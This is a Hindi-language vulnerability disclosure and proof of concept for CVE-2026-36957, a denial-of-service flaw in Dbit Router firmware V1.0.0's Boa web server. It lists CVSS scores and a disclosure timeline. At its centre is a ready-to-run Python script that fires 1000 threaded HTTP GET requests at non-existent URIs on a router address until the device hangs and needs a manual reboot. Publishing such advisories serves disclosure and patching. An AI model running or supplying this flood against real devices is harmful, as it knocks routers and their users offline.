
# CVE-2026-36957 के लिए प्रूफ-ऑफ-कॉन्सेप्ट Dbit Router फर्मवेयर में एक denial-of-service भेद्यता, जो Boa वेब सर्वर पर HTTP flood के माध्यम से संसाधनों की कमी और सिस्टम हैंग का कारण बनती है।
CVE ID: CVE-2026-36957 दिनांक: 2026-04-29 खोजकर्ता: Kirubel Solomne विक्रेता: Shenzhen Dibit Network Equipment Co., Ltd. उत्पाद: Dbit Router फर्मवेयर संस्करण: V1.0.0 CWE: CWE-400 - अनियंत्रित संसाधन खपत
Dbit Router फर्मवेयर V1.0.0, Boa वेब सर्वर URI हैंडलर के माध्यम से सेवा से वंचित (Denial of Service) की भेद्यता से ग्रस्त है। गैर-मौजूद URI पर HTTP GET अनुरोधों की उच्च-मात्रा वाली बाढ़ भेजकर, एक हमलावर फ़ाइल डिस्क्रिप्टर और मेमोरी बफ़र सहित महत्वपूर्ण सिस्टम संसाधनों को समाप्त कर सकता है। इसके परिणामस्वरूप कर्नेल डेडलॉक या सिस्टम हैंग हो जाता है, जो वेब प्रबंधन पोर्टल और सभी रूटिंग क्षमताओं को अक्षम कर देता है।
CVSS v3.1 स्कोर: 7.5 (उच्च)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
| मीट्रिक | मान |
|---|
| हमला वेक्टर | नेटवर्क |
| हमले की जटिलता | कम |
| आवश्यक विशेषाधिकार | कोई नहीं |
| उपयोगकर्ता सहभागिता | कोई नहीं |
| गोपनीयता प्रभाव | कोई नहीं |
| अखंडता प्रभाव | कोई नहीं |
| उपलब्धता प्रभाव | उच्च |
import requests
import threading
TARGET = "http://192.168.10.1"
def flood(i):
try:
requests.get(f"{TARGET}/nonexistent_{i}", timeout=2)
except:
pass
threads = []
for i in range(1000):
t = threading.Thread(target=flood, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
print("Done. Check if router is still responsive.")
अपेक्षित व्यवहार: सर्वर को कनेक्शन सीमित करना चाहिए और स्थिर रहना चाहिए। वास्तविक व्यवहार: राउटर का वेब इंटरफ़ेस अनुत्तरदायी हो जाता है; मैन्युअल रीबूट की आवश्यकता होती है।
| दिनांक | घटना |
|---|---|
| 2026-04-29 | भेद्यता की खोज की गई |
| 2026-04-29 | MITRE को रिपोर्ट किया गया |
| 2026-04-29 | CVE-2026-36957 आवंटित किया गया |
| 2026-04-29 | सार्वजनिक प्रकटीकरण |